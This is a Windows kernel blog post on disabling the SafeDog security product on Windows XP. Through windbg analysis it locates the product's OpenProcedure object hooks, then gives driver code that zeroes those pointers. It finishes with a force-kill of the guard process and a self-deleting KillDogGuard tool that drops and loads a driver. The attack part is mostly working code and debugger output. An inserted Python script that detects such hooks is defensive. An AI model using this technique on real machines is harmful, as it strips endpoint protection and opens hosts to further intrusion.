Windows Kernel Notes 3: Hands-on with SafeDogFileGuard.sys (object hook)
Preface
This post looks at how to restore the Dog's driver at ring 0 and thereby remove its various restrictions. There are of course plenty of sneaky ways to do this at ring 3 as well, but those are left aside for now.
First, inspect the driver SafeDogFileGuard.sys with PCHunter:

[PC Hunter Standard][ObjectType Hook]: 15
Function name | Current function address | Hook | Original address | Object type | Address | Module containing current function address
.......
OpenProcedure 0xB145E79A object hook - PsThreadType 0x8055A35C C:\WINDOWS\system32\DRIVERS\SafeDogFileGuard.sys
OpenProcedure 0xB145E5CE object hook - PsProcessType 0x8055A358 C:\WINDOWS\system32\DRIVERS\SafeDogFileGuard.sys
......
Debugging with windbg
The Dog hooks OpenProcedure.
Start by debugging it with windbg:

kd> dd PsProcessType // get the address of PsProcessType
8055a358 89e34e38 89e34c68 e10017e8 00000002
8055a368 00000003 00000000 00000000 00000000
8055a378 00000000 00000000 e18ee2ff e1754857
8055a388 e16bba07 00000000 00000000 00000000
8055a398 00000000 00000000 e19022c7 e209cc27
8055a3a8 00000000 00000000 00000000 00000000
8055a3b8 00000000 00000000 00000002 00000000
8055a3c8 00000000 00000000 00000000 00000000
kd> dt 89e34e38 _object_type // dump _OBJECT_TYPE to find the offset of the _OBJECT_TYPE_INITIALIZER (TypeInfo)
ntdll!_OBJECT_TYPE
+0x000 Mutex : _ERESOURCE
+0x038 TypeList : _LIST_ENTRY [ 0x89e34e70 - 0x89e34e70 ]
+0x040 Name : _UNICODE_STRING "Process"
+0x048 DefaultObject : (null)
+0x04c Index : 5
+0x050 TotalNumberOfObjects : 0x1a
+0x054 TotalNumberOfHandles : 0x63
+0x058 HighWaterNumberOfObjects : 0x1c
+0x05c HighWaterNumberOfHandles : 0x71
+0x060 TypeInfo : _OBJECT_TYPE_INITIALIZER
+0x0ac Key : 0x636f7250
+0x0b0 ObjectLocks : [4] _ERESOURCE
kd> dt 89e34e38+0x060 _OBJECT_TYPE_INITIALIZER
ntdll!_OBJECT_TYPE_INITIALIZER
+0x000 Length : 0x4c
+0x002 UseDefaultObject : 0 ''
+0x003 CaseInsensitive : 0 ''
+0x004 InvalidAttributes : 0xb0
+0x008 GenericMapping : _GENERIC_MAPPING
+0x018 ValidAccessMask : 0x1f0fff
+0x01c SecurityRequired : 0x1 ''
+0x01d MaintainHandleCount : 0 ''
+0x01e MaintainTypeList : 0 ''
+0x020 PoolType : 0 ( NonPagedPool )
+0x024 DefaultPagedPoolCharge : 0x1000
+0x028 DefaultNonPagedPoolCharge : 0x290
+0x02c DumpProcedure : (null)
+0x030 OpenProcedure : 0xb137a5ce long +0
+0x034 CloseProcedure : (null)
+0x038 DeleteProcedure : 0x805c77e2 void nt!PspProcessDelete+0
+0x03c ParseProcedure : (null)
+0x040 SecurityProcedure : 0x805edcf6 long nt!SeDefaultObjectMethod+0
+0x044 QueryNameProcedure : (null)
+0x048 OkayToCloseProcedure : (null)
kd> u 0xb137a5ce // disassemble 0xb137a5ce
SafeDogFileGuard+0x85ce:
b137a5ce 8bff mov edi,edi
b137a5d0 55 push ebp
b137a5d1 8bec mov ebp,esp
b137a5d3 8b450c mov eax,dword ptr [ebp+0Ch]
b137a5d6 83ec0c sub esp,0Ch
b137a5d9 56 push esi
b137a5da 33f6 xor esi,esi
b137a5dc 57 push edi
kd> dt _OBJECT_TYPE_INITIALIZER poi(PsThreadType)+0x60 // using the result above, go straight to the initializer in one step
ntdll!_OBJECT_TYPE_INITIALIZER
+0x000 Length : 0x4c
+0x002 UseDefaultObject : 0 ''
+0x003 CaseInsensitive : 0 ''
+0x004 InvalidAttributes : 0xb0
+0x008 GenericMapping : _GENERIC_MAPPING
+0x018 ValidAccessMask : 0x1f03ff
+0x01c SecurityRequired : 0x1 ''
+0x01d MaintainHandleCount : 0 ''
+0x01e MaintainTypeList : 0 ''
+0x020 PoolType : 0 ( NonPagedPool )
+0x024 DefaultPagedPoolCharge : 0
+0x028 DefaultNonPagedPoolCharge : 0x288
+0x02c DumpProcedure : (null)
+0x030 OpenProcedure : 0xb137a79a long +0
+0x034 CloseProcedure : (null)
+0x038 DeleteProcedure : 0x805c796a void nt!PspThreadDelete+0
+0x03c ParseProcedure : (null)
+0x040 SecurityProcedure : 0x805edcf6 long nt!SeDefaultObjectMethod+0
+0x044 QueryNameProcedure : (null)
+0x048 OkayToCloseProcedure : (null)
kd> u 0xb137a79a
SafeDogFileGuard+0x879a:
b137a79a 8bff mov edi,edi
b137a79c 55 push ebp
b137a79d 8bec mov ebp,esp
b137a79f 83ec30 sub esp,30h
b137a7a2 53 push ebx
b137a7a3 56 push esi
b137a7a4 57 push edi
b137a7a5 ff7510 push dword ptr [ebp+10h]
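Seen from the defender's side, the same structure walk is a quick way to audit object-type callbacks in a kd dump: on a clean kernel the procedure pointers in an _OBJECT_TYPE_INITIALIZER are either (null) or resolve to nt! symbols, so a non-null pointer that kd cannot resolve (such as the 0xb137a5ce above, which `u` places at SafeDogFileGuard+0x85ce) is an object hook, which is exactly what PCHunter's ObjectType Hook view reports. The Python script below is an added example, not code from the original post or from SafeDog/KillDogGuard. It parses the dd and dt output pasted above (the text is copied from this page, excerpted to the lines it needs, not taken from a live system) and computes the absolute slot addresses with the same +0x60 + 0x30 arithmetic, so the results can be compared with the addresses the DriverEntry log prints later in the post. The only assumption is the kd text layout.

```python
import re
from dataclasses import dataclass

# kd output copied from the windbg session above (dt dumps excerpted).
# Addresses are the ones printed on this page, not constructed values.
DD_PSPROCESSTYPE = "8055a358 89e34e38 89e34c68 e10017e8 00000002"
PSPROCESSTYPE_VA = 0x8055A358   # exported variable address, from the PCHunter table
PSTHREADTYPE_VA = 0x8055A35C    # exported variable address, from the PCHunter table

DT_OBJECT_TYPE = """\
ntdll!_OBJECT_TYPE
+0x040 Name : _UNICODE_STRING "Process"
+0x060 TypeInfo : _OBJECT_TYPE_INITIALIZER
"""

DT_PROCESS_INIT = """\
ntdll!_OBJECT_TYPE_INITIALIZER
+0x030 OpenProcedure : 0xb137a5ce long +0
+0x034 CloseProcedure : (null)
+0x038 DeleteProcedure : 0x805c77e2 void nt!PspProcessDelete+0
+0x040 SecurityProcedure : 0x805edcf6 long nt!SeDefaultObjectMethod+0
"""

DT_THREAD_INIT = """\
ntdll!_OBJECT_TYPE_INITIALIZER
+0x030 OpenProcedure : 0xb137a79a long +0
+0x034 CloseProcedure : (null)
+0x038 DeleteProcedure : 0x805c796a void nt!PspThreadDelete+0
+0x040 SecurityProcedure : 0x805edcf6 long nt!SeDefaultObjectMethod+0
"""

# "+0x030 OpenProcedure : <value>" -> offset, field name, raw value
FIELD_RE = re.compile(r"^\+0x([0-9a-fA-F]+)\s+(\w+)\s*:\s*(.*)$")
# "0x805c77e2 void nt!PspProcessDelete+0" (resolved) or "0xb137a5ce long +0" (unresolved)
PTR_RE = re.compile(r"^0x([0-9a-fA-F]+)\s+\w+\s+(\S*)")


@dataclass
class ProcedureSlot:
    name: str
    slot_va: int   # absolute address of the pointer slot inside the _OBJECT_TYPE
    target: int    # pointer value, 0 for (null)
    symbol: str    # kd's symbol such as "nt!PspProcessDelete", "" if unresolved


def parse_dt(text):
    """Map field name -> (offset, raw value) from a `dt` dump."""
    fields = {}
    for line in text.splitlines():
        m = FIELD_RE.match(line.strip())
        if m:
            fields[m.group(2)] = (int(m.group(1), 16), m.group(3).strip())
    return fields


def dwords_at(dd_line, va):
    """Read the dword at `va` out of one `dd` output line (base address + dwords)."""
    parts = dd_line.split()
    base, values = int(parts[0], 16), [int(p, 16) for p in parts[1:]]
    return values[(va - base) // 4]


def audit_type_initializer(object_type_va, dt_object_type, dt_initializer):
    """Resolve every *Procedure slot of the type's initializer to an absolute address."""
    typeinfo_off = parse_dt(dt_object_type)["TypeInfo"][0]   # +0x60 on this build
    slots = []
    for name, (off, raw) in parse_dt(dt_initializer).items():
        if not name.endswith("Procedure"):
            continue
        target, symbol = 0, ""
        if raw != "(null)":
            m = PTR_RE.match(raw)
            target = int(m.group(1), 16)
            if "!" in m.group(2):            # kd resolved the pointer into a module
                symbol = m.group(2).split("+")[0]
        slots.append(ProcedureSlot(name, object_type_va + typeinfo_off + off, target, symbol))
    return slots


def suspicious(slots):
    """Object hooks: non-null callbacks that do not resolve into the kernel image (nt!)."""
    return [s for s in slots if s.target and not s.symbol.startswith("nt!")]


def report():
    """Audit both object types; returns {type name: {slot name: ProcedureSlot}}."""
    out = {}
    for label, export_va, dt_init in (("PsProcessType", PSPROCESSTYPE_VA, DT_PROCESS_INIT),
                                      ("PsThreadType", PSTHREADTYPE_VA, DT_THREAD_INIT)):
        object_type_va = dwords_at(DD_PSPROCESSTYPE, export_va)   # same as poi(PsXxxType)
        slots = audit_type_initializer(object_type_va, DT_OBJECT_TYPE, dt_init)
        out[label] = {s.name: s for s in slots}
        for s in suspicious(slots):
            print(f"[!] {label}.{s.name} slot {s.slot_va:#010x} -> {s.target:#010x} (not in nt)")
    return out


if __name__ == "__main__":
    report()
```

The limit of this check is worth noting: on this XP build an unhooked OpenProcedure is simply (null), so once the slot has been zeroed the dump looks clean again. A product that wants to notice its own callback being removed has to compare the slot against the callback it registered, not look for a foreign pointer; on later Windows versions the supported route is ObRegisterCallbacks rather than patching the type's procedure table at all.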
Restoring the object hook in code
Based on the debugging results above, write the following in the driver entry:

ULONG uProcessAddr = (ULONG)(*PsProcessType) + 0x60 + 0x30; // address of the OpenProcedure slot in PsProcessType's _OBJECT_TYPE_INITIALIZER
KdPrint(("[+] OpenProcdure [PsProcessType] 0x%08x\n", uProcessAddr));
*(PULONG)uProcessAddr = 0x00000000;                          // zero the OpenProcedure [PsProcessType] pointer
ULONG uThreadAddr = (ULONG)(*PsThreadType) + 0x60 + 0x30;    // the same slot in PsThreadType's initializer
KdPrint(("[+] OpenProcdure [PsThreadType] 0x%08x\n", uThreadAddr));
*(PULONG)uThreadAddr = 0x00000000;                           // zero the OpenProcedure [PsThreadType] pointer
windbg debug log:

[+] -------------------- DriverEntry -----------------
Break instruction exception - code 80000003 (first chance)
HelloDrive!DriverEntry+0xaf:
bac7922f cc int 3
kd> p
HelloDrive!DriverEntry+0xb0:
bac79230 8b0d18a0c7ba mov ecx,dword ptr [HelloDrive!PsProcessType (bac7a018)]
kd> p
HelloDrive!DriverEntry+0xc1:
bac79241 8b45fc mov eax,dword ptr [ebp-4]
kd> p
[+] OpenProcdure [PsProcessType] 0x89e34ec8
HelloDrive!DriverEntry+0xd2:
bac79252 8b4dfc mov ecx,dword ptr [ebp-4]
kd> p
HelloDrive!DriverEntry+0xdb:
bac7925b 8b1514a0c7ba mov edx,dword ptr [HelloDrive!PsThreadType (bac7a014)]
kd> p
HelloDrive!DriverEntry+0xeb:
bac7926b 8b4df8 mov ecx,dword ptr [ebp-8]
kd> p
[+] OpenProcdure [PsThreadType] 0x89e34cf8
HelloDrive!DriverEntry+0xfc:
bac7927c 8b55f8 mov edx,dword ptr [ebp-8]
kd> p
HelloDrive!DriverEntry+0x105:
bac79285 33c0 xor eax,eax
kd> dd poi(PsProcessType)+0x60+0x30 l1
89e34ec8 00000000
kd> dd poi(PsThreadType)+0x60+0x30 l1
89e34cf8 00000000
kd> g
[+] -------------------- Driver Unload -----------------
The pointer now reads 00000000, so the hook is dead.
Now a whole series of sneaky things become possible, for example:

C:\Documents and Settings\Administrator>taskkill /im SafeDogGuardCenter.exe /f
成功: 已终止进程 "SafeDogGuardCenter.exe",其 PID 为 1156。
C:\Documents and Settings\Administrator>net user
\\FUCKAV-A5A6BAA4 的用户帐
-------------------------------------------------------------------------------
Administrator Guest HelpAssistant
SUPPORT_388945a0 test
命令成功完成。
Writing KillDogGuard
For convenience it is written as a single file. Its execution flow is:

Run KillDogGuard.exe -> drop KillDogGuard.sys -> load and start the driver -> unhook OpenProcedure -> terminate the guard process -> unload the driver and delete the file
VC 6.0 code
Screenshot
Code download
References
object hook: http://bbs.pediy.com/showthread.php?t=128161